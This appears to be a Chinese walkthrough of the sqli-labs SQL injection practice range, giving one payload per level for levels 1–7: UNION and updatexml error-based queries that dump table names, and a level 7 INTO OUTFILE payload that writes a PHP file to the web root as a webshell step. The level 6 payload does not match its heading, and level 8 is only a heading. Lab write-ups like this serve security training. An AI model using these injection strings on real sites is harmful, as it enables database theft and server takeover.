sql-labs靶场

第一关(get传参,单引号闭合,有回显,无过滤)

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第二关(get传参,无闭合,有回显,无过滤)

?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')

第三关(get传参,括号加单引号闭合,有回显,无过滤)

?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第四关(get传参,括号加双引号闭合,有回显,无过滤)

?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第五关(get传参,单引号闭合,无回显有报错,无过滤)

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

第六关(get传参,双引号闭合,无回显有报错,无过滤)

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

第七关(get传参,单引号加两个括号闭合,无回显有报错,无过滤)写webshell

?id=-1')) union select 1,2,'<?php phpinfo();' into outfile "D:\\phpstudy\\phpstudy_pro\\WWW\\sqli\\Less-7\\a.php" --+

第八关(get传参,单引号闭合,无回显无报错,无过滤)
相关推荐
好奇的菜鸟19 分钟前
如何在IntelliJ IDEA中设置数据库连接全局共享
java·数据库·intellij-idea
tan180°21 分钟前
MySQL表的操作(3)
linux·数据库·c++·vscode·后端·mysql
Hello.Reader2 小时前
Redis 延迟排查与优化全攻略
数据库·redis·缓存
简佐义的博客3 小时前
破解非模式物种GO/KEGG注释难题
开发语言·数据库·后端·oracle·golang
爬山算法3 小时前
MySQL(116)如何监控负载均衡状态?
数据库·mysql·负载均衡
JAVA学习通4 小时前
Mybatis--动态SQL
sql·tomcat·mybatis
老纪的技术唠嗑局5 小时前
OceanBase PoC 经验总结(二)—— AP 业务
数据库
阿里云大数据AI技术6 小时前
OpenSearch 视频 RAG 实践
数据库·人工智能·llm
m0_623955668 小时前
Oracle使用SQL一次性向表中插入多行数据
数据库·sql·oracle
阿蒙Amon9 小时前
C#读写文件:多种方式详解
开发语言·数据库·c#